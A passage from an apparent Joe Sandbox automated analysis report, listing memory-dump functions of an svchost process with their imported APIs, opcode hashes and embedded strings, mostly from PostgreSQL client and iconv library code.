                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcmemset
                                                                                            • String ID:
                                                                                            • API String ID: 947785774-0
                                                                                            • Opcode ID: e3940594ec7f73555511dd730e57fd8a3650c189e3bd6568bd07ef9ec0775b84
                                                                                            • Instruction ID: ca34cb53b04c8fcfc0278a44d8fddbaa152276bbc658d6a83c09249c9bdcd32b
                                                                                            • Opcode Fuzzy Hash: e3940594ec7f73555511dd730e57fd8a3650c189e3bd6568bd07ef9ec0775b84
                                                                                            • Instruction Fuzzy Hash: 34B10463B1C28086D7118FA8C04035EBEE1B755BACF658639DE2A5B7C4D339E982C780
                                                                                            APIs
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD601
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD621
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD64A
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD660
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7F9), ref: 00007FFDA36DD689
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: a1e44e65adb7dfe5ead3a669016fd1134545db574b0835f00e4ed316f870b1b0
                                                                                            • Instruction ID: b5e065fb2f6ab5538217c261c166b49b99d4f778b4c5b2225681f29b27ae457a
                                                                                            • Opcode Fuzzy Hash: a1e44e65adb7dfe5ead3a669016fd1134545db574b0835f00e4ed316f870b1b0
                                                                                            • Instruction Fuzzy Hash: 11212636B0AB8186EB049F65E4A02A97365FB84F84F1C1135DE8E1B75ACF39D494C358
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9e824c019b938f3e368e1071fca967f6651d8a02c2b16b0ab1511b726712c7ea
                                                                                            • Instruction ID: d1fb34760a8471a1d68e74bdaac7c1ea815d8cc40a6a65b37cb5c69206f35d67
                                                                                            • Opcode Fuzzy Hash: 9e824c019b938f3e368e1071fca967f6651d8a02c2b16b0ab1511b726712c7ea
                                                                                            • Instruction Fuzzy Hash: 3281F173F196959AE752CFA9C00471ABFE1F745BA8F558234CE281B348D339EA41CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d31fcd258d7eb59c28780b414e9cc7b30964fc1e18a315f7d7277b5be0e66e18
                                                                                            • Instruction ID: 4914472fc2d2e98edb09ebd0f309e5b260e1dffca19d2174e5c60ddcec9b2413
                                                                                            • Opcode Fuzzy Hash: d31fcd258d7eb59c28780b414e9cc7b30964fc1e18a315f7d7277b5be0e66e18
                                                                                            • Instruction Fuzzy Hash: 18615AE198E25466EB118BD990D07ADBF92A3077CDFC68532DF6807366D128CACAC345
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: %s$insufficient data in "T" message$out of memory for query result
                                                                                            • API String ID: 2221118986-1506934984
                                                                                            • Opcode ID: e38e3d093b8009d1594e09d26521006121828f110bd7ae55ef5d791641526b1a
                                                                                            • Instruction ID: f0be6b7445d6b7f9e8725cbcf2a19760432044216f4125d570b543fbb7e0cabc
                                                                                            • Opcode Fuzzy Hash: e38e3d093b8009d1594e09d26521006121828f110bd7ae55ef5d791641526b1a
                                                                                            • Instruction Fuzzy Hash: 66919172B0A68286FB60DF11E4602F977A2FB44B84F5C9031DE4DA7786EF39E5098704
                                                                                            APIs
                                                                                            • isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,00000002,00007FFDA36E7B19), ref: 00007FFDA36F5516
                                                                                            • isxdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F5539
                                                                                            • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F5545
                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,00000002,00007FFDA36E7B19), ref: 00007FFDA36F55A7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: isdigitislowerisspaceisxdigit
                                                                                            • String ID:
                                                                                            • API String ID: 991065306-0
                                                                                            • Opcode ID: 3e7a2c194a5707312c8dda877a588ef86d65e8615c8665a23fac9bd322b4b4cb
                                                                                            • Instruction ID: bb26755f7ae3b91839138492e83f78a8efb992d0ceec12b3b31c80b096e0dd76
                                                                                            • Opcode Fuzzy Hash: 3e7a2c194a5707312c8dda877a588ef86d65e8615c8665a23fac9bd322b4b4cb
                                                                                            • Instruction Fuzzy Hash: 54514622F1F16246FB308B18956037E7AD2AB44748F8D2131DF9E673D2DE2EEC058608
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc$freerealloc
                                                                                            • String ID:
                                                                                            • API String ID: 696964274-0
                                                                                            • Opcode ID: 9ffabb0dab98a52268d714b4266e7b13c75daf8d67ddf8f8b86f461290b40781
                                                                                            • Instruction ID: b9b6189e79755a070fa2332cfc40cc6f9f3a0ee01b48a0262fb0ea4cf895080a
                                                                                            • Opcode Fuzzy Hash: 9ffabb0dab98a52268d714b4266e7b13c75daf8d67ddf8f8b86f461290b40781
                                                                                            • Instruction Fuzzy Hash: 8151C423B0BE9689FB658B64983037DBF929B05BD4F4C5631D66E227C3DE2F90558208
                                                                                            APIs
                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000,00007FFDA36DDA51), ref: 00007FFDA36DDEAD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: column number %d is out of range 0..%d$out of memory$row number %d is out of range 0..%d
                                                                                            • API String ID: 3510742995-252844271
                                                                                            • Opcode ID: da5edc23f87b53490ded33621c4f4f6963b288cd677c6f8c1d0c6315c280e1fe
                                                                                            • Instruction ID: 24f08a76242585fbc72b7453cf6f2562c408327ec7f0345279b14859777155d9
                                                                                            • Opcode Fuzzy Hash: da5edc23f87b53490ded33621c4f4f6963b288cd677c6f8c1d0c6315c280e1fe
                                                                                            • Instruction Fuzzy Hash: 3151BD33B0AB4286FB50AF15E5602B967A2EF54BC4F1CA531DE0D27796DF3AE4118308
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep_amsg_exit
                                                                                            • String ID:
                                                                                            • API String ID: 1015461914-0
                                                                                            • Opcode ID: 00a1a00ef9f6fad419ea6f81d8f8bc600c2ddcf5b5d0ff3bac86aba5ef169f44
                                                                                            • Instruction ID: 2d0b610cf794b2bae2ebf3ebeb5f13edb644dff399755fc9777f3e2269dcfd8d
                                                                                            • Opcode Fuzzy Hash: 00a1a00ef9f6fad419ea6f81d8f8bc600c2ddcf5b5d0ff3bac86aba5ef169f44
                                                                                            • Instruction Fuzzy Hash: 5041F032B0665486F7068BCAED5039A2AA6B7987D8F8448B6DE0C47350DF7BC8D1C340
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$libintl_dgettext
                                                                                            • String ID: another command is already in progress$cannot queue commands during COPY$no connection to the server
                                                                                            • API String ID: 2163055111-3353571757
                                                                                            • Opcode ID: 75f88c50db84c2ec0b0f3e8b12d6debfb989c9555dda38240986ce09991c5eda
                                                                                            • Instruction ID: f94b094847e4502ce475bace59890240f27c8048f99e8b811c89bc7dd4986281
                                                                                            • Opcode Fuzzy Hash: 75f88c50db84c2ec0b0f3e8b12d6debfb989c9555dda38240986ce09991c5eda
                                                                                            • Instruction Fuzzy Hash: 72415822B0BA4395FA549A1295343B91292AF09BC4F5C7036DA0E6E38BDF7FE0458718
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: //IGNORE$//TRANSL$CP437
                                                                                            • API String ID: 0-2645255569
                                                                                            • Opcode ID: 478be36a9ae49c2bcf651dce55d74bac0e7665bc020284558af0c4a8de8f6a9d
                                                                                            • Instruction ID: d1d1838c2131378fab6907f5fb0a6fd6b5154e1c3dd06049c9f5a4373e6498f4
                                                                                            • Opcode Fuzzy Hash: 478be36a9ae49c2bcf651dce55d74bac0e7665bc020284558af0c4a8de8f6a9d
                                                                                            • Instruction Fuzzy Hash: 5A3128B2B3DA9094EF118BD79D0879EEFA2A752BC8F848131DE0447301DB6AC996C340
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdupfreemallocrealloc
                                                                                            • String ID:
                                                                                            • API String ID: 1052548509-0
                                                                                            • Opcode ID: 5e4c0247acb7fb60c567625a62fec96effb51d1eac2fb46d4f0ea471cb302272
                                                                                            • Instruction ID: 4f4e80035cbee8abcfc1ade8f0827221ecf944f5adc6f2d451a7e792b649730b
                                                                                            • Opcode Fuzzy Hash: 5e4c0247acb7fb60c567625a62fec96effb51d1eac2fb46d4f0ea471cb302272
                                                                                            • Instruction Fuzzy Hash: 44412A32A09B8282EF518F25D4A03F96761EF89F84F6D1136CE0E5B359DE3AD445C750
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: mallocmemset
                                                                                            • String ID: %s$insufficient data in "t" message$out of memory
                                                                                            • API String ID: 2882185209-824677079
                                                                                            • Opcode ID: 876e38004733227cce00c713f867f7f7533eda84ffb124a817d5fc5992d38dcf
                                                                                            • Instruction ID: 578cecaefe3089331df78aee14ee9c92ee435cec5fbf8a83026d179f961b7c4c
                                                                                            • Opcode Fuzzy Hash: 876e38004733227cce00c713f867f7f7533eda84ffb124a817d5fc5992d38dcf
                                                                                            • Instruction Fuzzy Hash: C541C271B0A64246FA54EB11E4602BAB792BF44B84F1C2034DF4D67787EF7EE5068308
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7E5), ref: 00007FFDA36E0113
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FFDA36DD7E5), ref: 00007FFDA36E0171
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7E5), ref: 00007FFDA36E01F3
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DD7E5), ref: 00007FFDA36E0206
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_strdupmalloc
                                                                                            • String ID:
                                                                                            • API String ID: 111713529-0
                                                                                            • Opcode ID: 61206e494067fd74966ae7ad8d563265d4ad5da0e993c83824ecd2e2e06bf238
                                                                                            • Instruction ID: cb8d332327f22807a9d37ed549717469e7ab407ae1a53c13ada8802b7756b25e
                                                                                            • Opcode Fuzzy Hash: 61206e494067fd74966ae7ad8d563265d4ad5da0e993c83824ecd2e2e06bf238
                                                                                            • Instruction Fuzzy Hash: D331F032B0AB4586EB02CB96E45427AB7A1FB48BA4F195235CE1C1B354DF79D086C304
                                                                                            APIs
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36EBFA8
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36EBFE0
                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EC079
                                                                                              • Part of subcall function 00007FFDA36EC330: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36EC1FC,?,?,?,?,?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36EC348
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freerealloc
                                                                                            • String ID:
                                                                                            • API String ID: 1152543572-0
                                                                                            • Opcode ID: d17e624561328d197d8c369512b54a5d02f75090a40c6d95cf4b23632d18d7ef
                                                                                            • Instruction ID: 5cda0524c757f553e1009431d557b61bed27fb5ad1bca21f6259ed3d676ea158
                                                                                            • Opcode Fuzzy Hash: d17e624561328d197d8c369512b54a5d02f75090a40c6d95cf4b23632d18d7ef
                                                                                            • Instruction Fuzzy Hash: B6318D32B0AB4682FA408F15E56027863A2FB44B91F6C6835DB5E27752DF3FE0648308
                                                                                            APIs
                                                                                            • IsDBCSLeadByteEx.KERNEL32 ref: 6601C33A
                                                                                            • MultiByteToWideChar.KERNEL32 ref: 6601C37A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Byte$CharLeadMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 2561704868-0
                                                                                            • Opcode ID: b528a5f7d4bedd53cc173c595c393bed900677d5dbc489e5a65e6e232faf74ab
                                                                                            • Instruction ID: 6810b55668767b238df4b156055cbec41bc502c0d3bba2300ea973e87a54fa2d
                                                                                            • Opcode Fuzzy Hash: b528a5f7d4bedd53cc173c595c393bed900677d5dbc489e5a65e6e232faf74ab
                                                                                            • Instruction Fuzzy Hash: D131B97260C780CBE3118FA9F40035EBAA0F795794F848135EE9487794DB7EC586CB01
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: isuppertolower
                                                                                            • String ID:
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: _errno$_get_osfhandle
                                                                                            • String ID:
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: isuppertolower
                                                                                            • String ID:
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36ECEE0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36ECF06
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D1070
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: _strdupfree
                                                                                            • String ID: could not generate random salt$out of memory
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: ErrorLastO_clear_flagsO_get_ex_dataO_set_flags
                                                                                            • String ID:
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: strcmp
                                                                                            • String ID: C$C$S
                                                                                            APIs
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FFDA36F33BE), ref: 00007FFDA36F56D9
                                                                                            • GetFileType.KERNEL32(?,?,?,00007FFDA36F33BE), ref: 00007FFDA36F56EE
                                                                                            • GetLastError.KERNEL32(?,?,?,00007FFDA36F33BE), ref: 00007FFDA36F56F6
                                                                                              • Part of subcall function 00007FFDA36F5DC0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FFDA36F5EED,?,?,?,?,00007FFDA36F43A0), ref: 00007FFDA36F5DCC
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FFDA36F33BE), ref: 00007FFDA36F571B
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorFileLastType
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00007FFDA36DB046
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00007FFDA36DB072
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: strncmp
                                                                                            • String ID: postgres://$postgresql://
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: getenvmalloc
                                                                                            • String ID: default
                                                                                            • API String ID: 3016273935-3814588639
                                                                                            • Opcode ID: e2bfb641286572b36a264d66209c0ca91ee167bda718b6a6fa8c4d1c5e4005ce
                                                                                            • Instruction ID: 60d8419ca783b915b40c4e473d7de4527dc0854a186bf2cf1fc4812de0d3247e
                                                                                            • Opcode Fuzzy Hash: e2bfb641286572b36a264d66209c0ca91ee167bda718b6a6fa8c4d1c5e4005ce
                                                                                            • Instruction Fuzzy Hash: 6051D462F0A6854DFF668A3998213742A91AF55BB4F2D2330DE3D133D6EA6ED8458304
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
